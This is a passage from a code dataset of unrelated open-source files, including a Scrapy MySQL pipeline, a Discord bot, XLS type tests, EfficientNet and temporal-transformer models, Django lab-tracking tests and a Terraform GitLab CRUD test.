If not, see <https://www.gnu.org/licenses/>.\n\nimport importlib\nimport util\nfrom database.database import Database\nfrom typing import Any, Dict, List, Tuple\n\ndef find_match(database, bucket_name: str, key: str, input_format: Dict[str, Any], output_format: Dict[str, Any], offsets: List[int], params: Dict[str, Any]):\n [combine, last, keys] = util.combine_instance(bucket_name, key, params)\n if combine:\n print(\"Finding match\")\n best_match = None\n match_score = 0\n format_lib = importlib.import_module(\"formats.\" + params[\"input_format\"])\n iterator_class = getattr(format_lib, \"Iterator\")\n\n keys.sort()\n with open(util.LOG_NAME, \"a+\") as f:\n for key in keys:\n entry = database.get_entry(bucket_name, key)\n it = iterator_class(entry, None)\n score: float = it.sum(format_lib.Identifiers[params[\"identifier\"]])\n\n print(\"key {0:s} score {1:d}\".format(key, score))\n f.write(\"key {0:s} score {1:d}\\n\".format(key, score))\n if score > match_score:\n best_match = key\n match_score = score\n\n if best_match is None:\n best_match = keys[0]\n\n output_format[\"ext\"] = \"match\"\n file_name = util.file_name(output_format)\n database.write(bucket_name, file_name, str.encode(best_match), {}, True)\n\n\ndef main(*argv):\n util.handle(argv, find_match)\n","repo_name":"saj9191/ripple","sub_path":"lambdas/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"39965644231","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport os\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\n\n\nclass KezhanCrawlerPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass CourseImagePipeline(ImagesPipeline):\n def item_completed(self, results, item, info):\n if \"front_image_url\" in item:\n for ok, value in results:\n image_file_path = value[\"path\"]\n item[\"front_image_path\"] = image_file_path\n\n return item\n\n\nclass MySQLTwistedPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls, settings):\n dbparms = dict(\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DBNAME\"],\n user=settings[\"MYSQL_USER\"],\n passwd=settings[\"MYSQL_PASSWORD\"],\n charset='utf8',\n cursorclass=MySQLdb.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"MySQLdb\", **dbparms)\n\n return cls(dbpool)\n\n def process_item(self, item, spider):\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider) # handle exceptions\n\n def handle_error(self, failure, item, spider):\n print(failure)\n\n def do_insert(self, cursor, item):\n insert_sql, params = item.get_insert_sql()\n print(insert_sql, params)\n cursor.execute(insert_sql, params)\n","repo_name":"SaltyFishWithKezhan/kezhan-crawler","sub_path":"kezhan_crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"}
+{"seq_id":"74232713229","text":"\"\"\" Cody Kenstler\nUsing discord.py: https://discordpy.readthedocs.io/en/rewrite/index.html\n\"\"\"\nimport discord\nimport os\nfrom discord.ext import commands\nimport Functions\n\n# Sets what prefix 
triggers the bot commands\nbot = commands.Bot(command_prefix='$')\n\n\n# Announce successful connection to Discord\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n\n# Announce successful disconnect from Discord servers\n@bot.event\nasync def on_disconnect():\n print('We have logged out of Discord!')\n\n\n\"\"\" While load, unload, and reload are admin functions, \nit's outside the admin class so that it can never be removed accidentally\"\"\"\n# command allows user to load in new cogs after the bot is running\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def load(ctx, extension):\n bot.load_extension(f'cogs.{extension}')\n\n\n# command allows user to unload in new cogs after the bot is running\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def unload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n\n\n# Update a cog to it's newest version, if there is an error the bot will rollback\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def reload(ctx, extension):\n bot.reload_extension(f'cogs.{extension}')\n\n\n# Load all cogs into bot\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n bot.load_extension(f'cogs.{filename[:-3]}')\n\nbot.run(Functions.login())\n","repo_name":"Irimis/Discord_Bot","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8503388087","text":"from absl.testing import absltest\nfrom xls.dslx import span\nfrom xls.dslx.concrete_type import ArrayType\nfrom xls.dslx.concrete_type import BitsType\nfrom xls.dslx.concrete_type import ConcreteType\nfrom xls.dslx.concrete_type import TupleType\nfrom xls.dslx.parametric_expression import ParametricSymbol\n\n\nclass ConcreteTypeTest(absltest.TestCase):\n\n def test_nil_tuple(self):\n nil = TupleType(members=())\n self.assertTrue(nil.is_nil())\n\n t = TupleType(members=(nil,))\n self.assertFalse(t.is_nil())\n\n def test_equality(self):\n fake_pos = span.Pos('', 0, 0)\n fake_span = span.Span(fake_pos, fake_pos)\n p = BitsType(signed=False, size=ParametricSymbol('N', fake_span))\n c = BitsType(signed=False, size=32)\n self.assertTrue(p.__ne__(c))\n self.assertFalse(p.__eq__(c))\n\n def test_array_vs_multidim_bits_equality(self):\n a = ArrayType(BitsType(signed=False, size=5), 7)\n self.assertEqual(str(a), 'uN[5][7]')\n self.assertEqual(7 * 5, a.get_total_bit_count())\n self.assertEqual(7, a.size)\n self.assertEqual(5, a.get_element_type().size)\n self.assertEqual((7, 5), a.get_all_dims())\n\n self.assertEqual((), TupleType(()).get_all_dims())\n\n def test_array_of_tuple_all_dims(self):\n a = ArrayType(TupleType(()), 7)\n self.assertEqual((7,), a.get_all_dims())\n\n def test_stringify(self):\n u32 = BitsType(signed=False, size=32)\n tabular = [\n # type size total_bit_count str\n (ArrayType(u32, 7), 7, 32 * 7, 'uN[32][7]'),\n (u32, 32, 32, 'uN[32]'),\n ]\n for t, size, total_bit_count, s in tabular:\n self.assertEqual(t.size, size)\n self.assertEqual(t.get_total_bit_count(), total_bit_count)\n self.assertEqual(str(t), s)\n\n def test_arrayness(self):\n tabular = [\n # (type, is_array, element_count)\n (TupleType(members=()), False, None),\n (BitsType(signed=False, size=5), False, None),\n (ArrayType(BitsType(False, 5), 7), True, 7),\n (ArrayType(TupleType(members=()), 7), True, 7),\n ]\n\n for t, is_array, element_count in tabular:\n 
self.assertEqual(isinstance(t, ArrayType), is_array, msg=str(t))\n if is_array:\n self.assertEqual(t.size, element_count, msg=str(t))\n\n def test_named_tuple_vs_tuple_compatibility(self):\n u32 = ConcreteType.U32\n u8 = ConcreteType.U8\n named = TupleType((('x', u32), ('y', u8)), struct=None)\n unnamed = TupleType((u32, u8))\n self.assertTrue(named.compatible_with(unnamed))\n self.assertNotEqual(named, unnamed)\n self.assertEqual(named.tuple_names, ('x', 'y'))\n\n def test_array_bit_count(self):\n e = BitsType(signed=False, size=4)\n a = ArrayType(e, 3)\n self.assertEqual(a.get_total_bit_count(), 12)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"julianviera99/xls","sub_path":"xls/dslx/concrete_type_test.py","file_name":"concrete_type_test.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"12899741164","text":"\"\"\" EfficientNet https://arxiv.org/abs/2104.00298\"\"\"\nimport tensorflow as tf\nfrom pydantic import BaseModel, Field\n\nfrom .blocks import batch_norm, conv2d, make_divisible, mbconv_block, relu6\nfrom .defines import KerasLayer, MBConvParams\n\n\nclass EfficientNetParams(BaseModel):\n \"\"\"EfficientNet parameters\"\"\"\n\n blocks: list[MBConvParams] = Field(default_factory=list, description=\"EfficientNet blocks\")\n input_filters: int = Field(default=0, description=\"Input filters\")\n input_kernel_size: int | tuple[int, int] = Field(default=3, description=\"Input kernel size\")\n input_strides: int | tuple[int, int] = Field(default=2, description=\"Input stride\")\n output_filters: int = Field(default=0, description=\"Output filters\")\n include_top: bool = Field(default=True, description=\"Include top\")\n dropout: float = Field(default=0.2, description=\"Dropout rate\")\n drop_connect_rate: float = Field(default=0.2, description=\"Drop connect rate\")\n model_name: str = Field(default=\"EfficientNetV2\", description=\"Model name\")\n\n\ndef efficientnet_core(blocks: list[MBConvParams], drop_connect_rate: float = 0) -> KerasLayer:\n \"\"\"EfficientNet core\n\n Args:\n blocks (list[MBConvParam]): MBConv params\n drop_connect_rate (float, optional): Drop connect rate. 
Defaults to 0.\n\n    Returns:\n        KerasLayer: Core\n    \"\"\"\n\n    def layer(x: tf.Tensor) -> tf.Tensor:\n        global_block_id = 0\n        total_blocks = sum((b.depth for b in blocks))\n        for i, block in enumerate(blocks):\n            filters = make_divisible(block.filters, 8)\n            for d in range(block.depth):\n                name = f\"stage{i+1}.mbconv{d+1}\"\n                block_drop_rate = drop_connect_rate * global_block_id / total_blocks\n                x = mbconv_block(\n                    filters,\n                    block.ex_ratio,\n                    block.kernel_size,\n                    block.strides if d == 0 else 1,\n                    block.se_ratio,\n                    droprate=block_drop_rate,\n                    name=name,\n                )(x)\n                global_block_id += 1\n            # END FOR\n        # END FOR\n        return x\n\n    return layer\n\n\ndef EfficientNetV2(\n    x: tf.Tensor,\n    params: EfficientNetParams,\n    num_classes: int | None = None,\n):\n    \"\"\"Create EfficientNet V2 TF functional model\n\n    Args:\n        x (tf.Tensor): Input tensor\n        params (EfficientNetParams): Model parameters.\n        num_classes (int, optional): # classes.\n\n    Returns:\n        tf.keras.Model: Model\n    \"\"\"\n    # Stem\n    if params.input_filters > 0:\n        name = \"stem\"\n        filters = make_divisible(params.input_filters, 8)\n        y = conv2d(\n            filters,\n            kernel_size=params.input_kernel_size,\n            strides=params.input_strides,\n            name=name,\n        )(x)\n        y = batch_norm(name=name)(y)\n        y = relu6(name=name)(y)\n    else:\n        y = x\n\n    y = efficientnet_core(blocks=params.blocks, drop_connect_rate=params.drop_connect_rate)(y)\n\n    if params.output_filters:\n        name = \"neck\"\n        filters = make_divisible(params.output_filters, 8)\n        y = conv2d(filters, kernel_size=(1, 1), strides=(1, 1), padding=\"same\", name=name)(y)\n        y = batch_norm(name=name)(y)\n        y = relu6(name=name)(y)\n\n    if params.include_top:\n        name = \"top\"\n        y = tf.keras.layers.GlobalAveragePooling2D(name=f\"{name}.pool\")(y)\n        if 0 < params.dropout < 1:\n            y = tf.keras.layers.Dropout(params.dropout)(y)\n        y = tf.keras.layers.Dense(num_classes, name=name)(y)\n    model = tf.keras.Model(x, y, name=params.model_name)\n    return model\n","repo_name":"AmbiqAI/heartkit","sub_path":"heartkit/models/efficientnet.py","file_name":"efficientnet.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} {"seq_id":"3797531765","text":"import socket\n\nfrom cred import IP, PORT\n\n\nclass Socket(socket.socket):\n    def __init__(self):\n        super(Socket, self).__init__(\n            socket.AF_INET,\n            socket.SOCK_STREAM,\n        )\n        self.IP = IP\n        self.PORT = int(PORT)\n        self.CODING = 'utf-8'\n        self.PACKAGE_SIZE = 2048\n        self.CONNECTED = 'connected'\n        self.type_object = None\n        self._quit = False\n        self.clients = []\n        self.status = 'offline'\n        self.data = ''\n\n    def set_down(self):\n        self.status = '[ client stopped ]'\n        print(self.status)\n        self._quit = True\n        self.close()\n        exit()\n\n    def set_up(self):\n        raise NotImplementedError()  # NotImplemented is a constant, not an exception\n","repo_name":"nikitaminiaev/Assembler","sub_path":"stub_microcontroller/mySocket_stub.py","file_name":"mySocket_stub.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} {"seq_id":"21320834500","text":"from datetime import datetime\nfrom datetime import timedelta\nimport time\nimport json\nimport requests\nimport random\nfrom random import randrange\nimport pytz\n\nimport names # pip install names\nfrom django.test import TestCase\nfrom django.test import LiveServerTestCase\nfrom django.test import Client\nfrom django.shortcuts import get_object_or_404\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.db.models import Q\n
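# Q objects let test_can_query_by_time_period below keep only overlapping\n# stays via exclude(Q(checkin__gt=stop) | Q(checkout__lt=start)).\nfrom 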
django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\n\nfrom kmutnbtrackapp.models import History, Person, Lab, User\n# Create your tests here.\n\n\nutc=pytz.UTC\nclass Searching_test(LiveServerTestCase):\n    def generate_history(self, count, person_list, lab_list, start, end):  # needs self: it is called as a method from setUp\n        def random_datetime(start, end):\n            \"\"\"\n            This function will return a random datetime between two datetime \n            objects.\n            \"\"\"\n            start = datetime.strptime(start, '%d/%m/%Y %H:%M') # '1/1/2020 9:00'\n            end = datetime.strptime(end, '%d/%m/%Y %H:%M') # '1/1/2020 9:00'\n            delta = end - start\n            int_delta = (delta.days * 24 * 60) + (delta.seconds / 60)\n            random_minute = randrange(int_delta)\n            return start + timedelta(minutes=random_minute)\n\n        class infinite_iterator(): \n            def __init__(self,lst):\n                self.i = 0\n                self.lst = lst\n                self.lst_len = len(lst)\n            def next(self): \n                result = self.lst[self.i % self.lst_len]\n                self.i += 1\n                return result\n\n        person_list = infinite_iterator(person_list)\n\n        for i in range(count):\n            p = person_list.next()\n            checkin_time = random_datetime(start, end)\n            checkout_time = checkin_time + timedelta(hours=random.choice([1,2,3]))\n            a = History.objects.create( person=p, lab=random.choice(lab_list), checkin=checkin_time, checkout=checkout_time)\n            a.checkin=checkin_time\n            a.save()\n\n    def setUp(self):  # unittest calls setUp as a bound method, so self is required\n        labA = Lab.objects.create(name=\"computer\", max_number_of_people=10)\n        labB = Lab.objects.create(name=\"ece\", max_number_of_people=10)\n        labC = Lab.objects.create(name=\"physic\", max_number_of_people=10)\n        lablist = [labA, labB, labC]\n        \n        person_list = [] \n        for i in range(25):\n            firstname = names.get_first_name() + str(randrange(1000))\n            lastname = names.get_last_name()\n            u = User.objects.create(username=firstname,email='',password=lastname)\n            p = Person.objects.create(user=u, first_name=firstname, last_name=lastname)\n            person_list.append(p)\n        \n        self.generate_history(100, person_list, lablist, \"1/1/2020 9:00\", \"1/1/2020 16:00\")\n        self.generate_history(100, person_list, lablist, \"2/1/2020 9:00\", \"2/1/2020 16:00\")\n\n\n    def test_can_query_by_name(self):\n        pass\n    def test_can_query_by_lab_name(self):\n        pass\n    def test_can_query_by_time_period(self): \n        start = datetime.strptime(\"2020-1-1T12:00 +0700\", \"%Y-%m-%dT%H:%M %z\")\n        stop = datetime.strptime(\"2020-1-2T12:00 +0700\", \"%Y-%m-%dT%H:%M %z\")\n        histories = History.objects.all()\n        histories = histories.exclude( Q(checkin__gt=stop) | Q(checkout__lt=start) )\n        for h in histories:\n            checkin = h.checkin\n            checkout = h.checkout\n            print(checkin, checkout, start, stop)\n            self.assertTrue(\n                (checkin >= start and checkin <= stop) # intersect forward\n                or (checkout >= start and checkout <= stop) # intersect backward\n                or (checkin >= start and checkout <= stop) # intersect inside\n                or (checkin <= start and checkout>= stop) \n            )\n    def test_can_search_people_who_close_to_infected_person(self):\n        pass\n","repo_name":"kmutnb-covid19/lab_track","sub_path":"kmutnbtrackapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"82"} {"seq_id":"41295308534","text":"class Solution:\n    def isRobotBounded(self, instructions: str) -> bool:\n        directions = [(0,1), (1, 0), (0, -1), (-1, 0)]\n        x = y = 0\n        index = 0\n        for i in instructions:\n            if i == 'L':\n                index = (index + 3) % 4\n            elif i == \"R\":\n                index = (index +1) % 4\n            else:\n                x += directions[index][0]\n                y += directions[index][1]\n
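        # The robot is trapped in a circle iff one pass of the instructions\n        # either returns it to the origin or leaves it facing away from north\n        # (index != 0): any net rotation cancels the drift within four passes.\n        return (x == 0 and y ==0) or index 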
!=0","repo_name":"Ishitagangal/LeetCode-Practice","sub_path":"Amazon/Medium/22. Is robot bounded.py","file_name":"22. Is robot bounded.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71034040268","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F_func\nfrom .net import Unit2D\nimport math\nimport numpy as np\nimport time\n\n'''Class that implements the windowed version of temporal transformer.\nFunction adapted from: https://github.com/leaderj1001/Attention-Augmented-Conv2d\n'''\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nmulti_matmul = False\ndropout = False\nscale_norm = False\n\n\nclass tcn_unit_attention_block(nn.Module):\n def __init__(self, in_channels, out_channels, dv_factor, dk_factor, Nh,\n relative, only_temporal_attention, dropout, kernel_size_temporal, stride, weight_matrix,\n last, layer, device, more_channels, drop_connect, n, dim_block1, dim_block2, dim_block3, num_point,\n bn_flag=True,\n shape=25, visualization=False, data_normalization=True, skip_conn=True, more_relative=False):\n super(tcn_unit_attention_block, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.layer = layer\n self.drop_connect = drop_connect\n self.visualization = visualization\n self.more_channels = more_channels\n self.data_normalization = data_normalization\n self.skip_conn = skip_conn\n self.only_temporal_att = only_temporal_attention\n self.kernel_size_temporal = kernel_size_temporal\n self.more_relative = more_relative\n self.kernel_size_attention = 9\n self.num = n\n self.num_point=num_point\n self.dk = int(dk_factor * out_channels)\n if (not self.only_temporal_att):\n self.dv = int(dv_factor * out_channels)\n else:\n self.dv = out_channels\n self.Nh = Nh\n\n self.bn_flag = bn_flag\n self.shape = shape\n self.relative = relative\n self.stride = stride\n if data_normalization:\n self.data_bn = nn.BatchNorm1d(self.in_channels * self.num_point)\n\n self.padding = (self.kernel_size_temporal - 1) // 2\n self.bn = nn.BatchNorm2d(out_channels)\n self.weight_matrix = weight_matrix\n\n if ((self.in_channels != self.out_channels) or (stride != 1)):\n self.down = Unit2D(\n self.in_channels, self.out_channels, kernel_size=1, stride=stride)\n else:\n self.down = None\n self.relu = nn.ReLU(inplace=True)\n self.last = last\n if dropout:\n self.dropout = nn.Dropout(0.25)\n\n assert self.Nh != 0, \"integer division or modulo by zero, Nh >= 1\"\n assert self.dk % self.Nh == 0, \"dk should be divided by Nh. (example: out_channels: 20, dk: 40, Nh: 4)\"\n assert self.dv % self.Nh == 0, \"dv should be divided by Nh. 
(example: out_channels: 20, dv: 4, Nh: 4)\"\n\n # Temporal convolution\n if (not self.only_temporal_att):\n self.tcn_conv = Unit2D(in_channels, out_channels - self.dv, dropout=dropout,\n kernel_size=kernel_size_temporal,\n stride=self.stride)\n if (self.more_channels):\n\n self.qkv_conv = nn.Conv2d(self.in_channels, (2 * self.dk + self.dv) * self.Nh // self.num,\n kernel_size=(1, stride),\n stride=(1, stride),\n padding=0)\n else:\n self.qkv_conv = nn.Conv2d(self.in_channels, 2 * self.dk + self.dv, kernel_size=(1, stride),\n stride=(1, stride),\n padding=0)\n if (self.more_channels):\n\n self.attn_out = nn.Conv2d(self.dv * self.Nh // self.num, self.dv, kernel_size=1, stride=1)\n else:\n self.attn_out = nn.Conv2d(self.dv, self.dv, kernel_size=1, stride=1)\n\n if self.out_channels == 64:\n self.block_dim = dim_block1\n\n if self.out_channels == 128:\n self.block_dim = dim_block2\n\n if self.out_channels == 256:\n self.block_dim = dim_block3\n\n if self.relative:\n if self.more_channels:\n self.key_rel = nn.Parameter(\n\n torch.randn((2 * self.block_dim - 1, self.dk // self.num), requires_grad=True))\n\n else:\n self.key_rel = nn.Parameter(\n\n torch.randn((2 * self.block_dim - 1, self.dk // Nh), requires_grad=True))\n\n\n def forward(self, x):\n # Input x\n # (batch_size, channels, time, joints)\n N1, C, T1, V = x.size()\n\n x_sum = x\n\n if (self.data_normalization):\n x = x.permute(0, 1, 3, 2).reshape(N1, C * V, T1)\n x = self.data_bn(x)\n x = x.reshape(N1, C, V, T1).permute(0, 1, 3, 2)\n\n x = x.permute(0, 3, 1, 2).reshape(-1, C, 1, T1)\n\n if scale_norm:\n self.scale = ScaleNorm(scale=C ** 0.5)\n x = self.scale(x)\n\n # Temporal Transformer mechanism is applied separately on each block. Then, the results are concatenated.\n\n for i in range(0, T1 // self.block_dim):\n\n block = x[:, :, :, i * self.block_dim: (i * self.block_dim + self.block_dim)]\n N, C, _, T = block.shape\n flat_q, flat_k, flat_v, q, k, v = self.compute_flat_qkv(block, self.dk, self.dv, self.Nh)\n B, self.Nh, C, T = flat_q.size()\n\n # Calculate the scores, obtained by doing q*k\n # (batch_size, Nh, time, dkh)*(batch_size, Nh, dkh, time) = (batch_size, Nh, time, time)\n logits = torch.matmul(flat_q.transpose(2, 3), flat_k)\n\n if self.relative:\n rel_logits = self.relative_logits(q, self.block_dim, i)\n logits_sum = torch.add(logits, rel_logits)\n\n # Calculate weights\n if self.relative:\n\n weights = F_func.softmax(logits_sum, dim=-1)\n\n else:\n weights = F_func.softmax(logits, dim=-1)\n\n if (self.drop_connect and self.training):\n mask = torch.bernoulli((0.5) * torch.ones(B * self.Nh * T, device=device))\n mask = mask.reshape(B, self.Nh, T).unsqueeze(2).expand(B, self.Nh, T, T)\n weights = weights * mask\n weights = weights / (weights.sum(3, keepdim=True) + 1e-8)\n\n # attn_out\n # (batch, Nh, time, dvh)\n # weights*V\n # (batch, Nh, time, time)*(batch, Nh, time, dvh)=(batch, Nh, time, dvh)\n attn_out = torch.matmul(weights, flat_v.transpose(2, 3))\n\n if not self.more_channels:\n attn_out = torch.reshape(attn_out, (B, self.Nh, 1, T, self.dv // self.Nh))\n else:\n attn_out = torch.reshape(attn_out, (B, self.Nh, 1, T, self.dv // self.num))\n\n # All the blocks are concatenated\n if i == 0:\n attn_out_final = attn_out\n else:\n attn_out_final = torch.cat((attn_out_final, attn_out), dim=3)\n\n attn_out = attn_out_final.permute(0, 1, 4, 2, 3)\n\n # combine_heads_2d, combine heads only after having calculated each Z separately\n # (batch, Nh*dv, time, 1)\n attn_out = self.combine_heads_2d(attn_out)\n # Multiply for W0 
(batch, out_channels, time, 1) with out_channels=dv\n attn_out = self.attn_out(attn_out)\n attn_out = attn_out.reshape(N1, V, -1, T1 // self.stride).permute(0, 2, 3, 1)\n\n if self.skip_conn:\n if dropout:\n attn_out = self.dropout(attn_out)\n\n if (not self.only_temporal_att):\n x = self.tcn_conv(x_sum)\n result = torch.cat((x, attn_out), dim=1)\n else:\n result = attn_out\n\n result += (x_sum if (self.down is None) else self.down(x_sum))\n\n\n else:\n if (not self.only_temporal_att):\n x = self.tcn_conv(x_sum)\n result = torch.cat((x, attn_out), dim=1)\n else:\n result = attn_out\n\n result += (x_sum if (self.down is None) else self.down(x_sum))\n\n\n else:\n result = attn_out\n\n if (self.bn_flag):\n result = self.bn(result)\n result = self.relu(result)\n return result\n\n def compute_flat_qkv(self, x, dk, dv, Nh):\n qkv = self.qkv_conv(x)\n N, C, H, W = qkv.size()\n if self.more_channels:\n q, k, v = torch.split(qkv, [dk * self.Nh // self.num, dk * self.Nh // self.num, dv * self.Nh // self.num],\n dim=1)\n else:\n q, k, v = torch.split(qkv, [dk, dk, dv], dim=1)\n\n q = self.split_heads_2d(q, Nh)\n k = self.split_heads_2d(k, Nh)\n v = self.split_heads_2d(v, Nh)\n\n dkh = dk // Nh\n q *= dkh ** -0.5\n if self.more_channels:\n flat_q = torch.reshape(q, (N, Nh, dk // self.num, H * W))\n flat_k = torch.reshape(k, (N, Nh, dk // self.num, H * W))\n flat_v = torch.reshape(v, (N, Nh, dv // self.num, H * W))\n else:\n flat_q = torch.reshape(q, (N, Nh, dkh, H * W))\n flat_k = torch.reshape(k, (N, Nh, dkh, H * W))\n flat_v = torch.reshape(v, (N, Nh, dv // self.Nh, H * W))\n return flat_q, flat_k, flat_v, q, k, v\n\n def split_heads_2d(self, x, Nh):\n B, channels, F, V = x.size()\n ret_shape = (B, Nh, channels // Nh, F, V)\n split = torch.reshape(x, ret_shape)\n return split\n\n def combine_heads_2d(self, x):\n batch, Nh, dv, F, V = x.size()\n ret_shape = (batch, Nh * dv, F, V)\n return torch.reshape(x, ret_shape)\n\n def relative_logits(self, q, blocks_dim, i):\n B, Nh, dk, _, T = q.size()\n # B, Nh, V, T, dk -> B, Nh, F, 1, dk\n q = q.permute(0, 1, 3, 4, 2)\n q = q.reshape(B, Nh, T, dk)\n rel_logits = self.relative_logits_1d(q, self.key_rel)\n # rel_logits_h = self.relative_logits_1d(torch.transpose(q, 2, 3), self.key_rel_h, V, T, Nh, \"h\")\n return rel_logits\n\n def relative_logits_1d(self, q, rel_k):\n # compute relative logits along one dimension\n # (B, Nh, 1, V, channels // Nh)*(2 * K - 1, self.dk // Nh)\n # (B, Nh, 1, V, 2 * K - 1)\n # print(\"case\", case)\n # print(\"input relative logits_q \", q.shape)\n # print(\"input relative logits_rel \", rel_k.shape)\n\n rel_logits = torch.einsum('bhld,md->bhlm', q, rel_k)\n\n rel_logits = self.rel_to_abs(rel_logits)\n B, Nh, L, L = rel_logits.size()\n\n return rel_logits\n\n def rel_to_abs(self, x):\n B, Nh, L, _ = x.size()\n col_pad = torch.zeros((B, Nh, L, 1)).to(x)\n x = torch.cat((x, col_pad), dim=3)\n flat_x = torch.reshape(x, (B, Nh, L * 2 * L))\n flat_pad = torch.zeros((B, Nh, L - 1)).to(x)\n flat_x_padded = torch.cat((flat_x, flat_pad), dim=2)\n\n final_x = torch.reshape(flat_x_padded, (B, Nh, L + 1, 2 * L - 1))\n final_x = final_x[:, :, :L, L - 1:]\n return final_x\n\n\nclass ScaleNorm(nn.Module):\n \"\"\"ScaleNorm\"\"\"\n\n def __init__(self, scale, eps=1e-5):\n super(ScaleNorm, self).__init__()\n self.scale = scale\n\n self.eps = eps\n\n def forward(self, x):\n norm = self.scale / torch.norm(x, dim=1, keepdim=True).clamp(min=self.eps)\n return x * 
norm\n","repo_name":"Chiaraplizz/ST-TR","sub_path":"code/st_gcn/net/temporal_transformer_windowed.py","file_name":"temporal_transformer_windowed.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"82"} +{"seq_id":"37192388811","text":"import logging\nimport os\nfrom typing import Callable, Dict, List, Optional\nfrom uuid import UUID\n\nimport pytest\nfrom helpers.utils import deploy_model, is_deployment_with_change\nfrom providers.gitlab.helpers.gitlab_client import GitlabClient\nfrom providers.gitlab.helpers.gitlab_project import GitlabProject\nfrom providers.gitlab.helpers.gitlab_provider import GitlabProvider\nfrom pytest_inmanta.plugin import Project\n\nfrom inmanta.agent.agent import Agent\nfrom inmanta.const import Change, VersionState\nfrom inmanta.protocol.endpoints import Client\nfrom inmanta.server.protocol import Server\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef project_is_deployed(path: str, client: GitlabClient) -> bool:\n return client.get_project(path) is not None\n\n\n@pytest.mark.terraform_provider_gitlab\n@pytest.mark.asyncio\nasync def test_crud(\n project: Project,\n server: Server,\n client: Client,\n environment: str,\n agent_factory: Callable[\n [UUID, Optional[str], Optional[Dict[str, str]], bool, List[str]], Agent\n ],\n provider: GitlabProvider,\n parent_namespace_id: int,\n parent_namespace_path: str,\n gitlab_client: GitlabClient,\n project_name: str,\n cache_agent_dir: str,\n):\n await agent_factory(\n environment=environment,\n hostname=\"node1\",\n agent_map={provider.agent: \"localhost\"},\n code_loader=False,\n agent_names=[provider.agent],\n )\n\n gitlab_project = GitlabProject(\n \"my project\",\n project_name,\n \"my original description\",\n provider,\n parent_namespace_id,\n )\n\n def model(purged: bool = False) -> str:\n m = (\n \"\\nimport terraform\\n\\n\"\n + provider.model_instance(\"provider\")\n + \"\\n\"\n + gitlab_project.model_instance(\"project\", purged)\n )\n LOGGER.debug(m)\n return m\n\n project_path = os.path.join(parent_namespace_path, project_name)\n\n assert not project_is_deployed(project_path, gitlab_client)\n\n # Create\n create_model = model()\n assert (\n await deploy_model(project, create_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.created\n\n assert project_is_deployed(project_path, gitlab_client)\n\n # Update\n gitlab_project.description = gitlab_project.description + \" (updated)\"\n update_model = model()\n assert (\n await deploy_model(project, update_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.updated\n\n assert project_is_deployed(project_path, gitlab_client)\n\n # Delete\n delete_model = model(purged=True)\n assert (\n await deploy_model(project, delete_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.purged\n\n assert not project_is_deployed(project_path, 
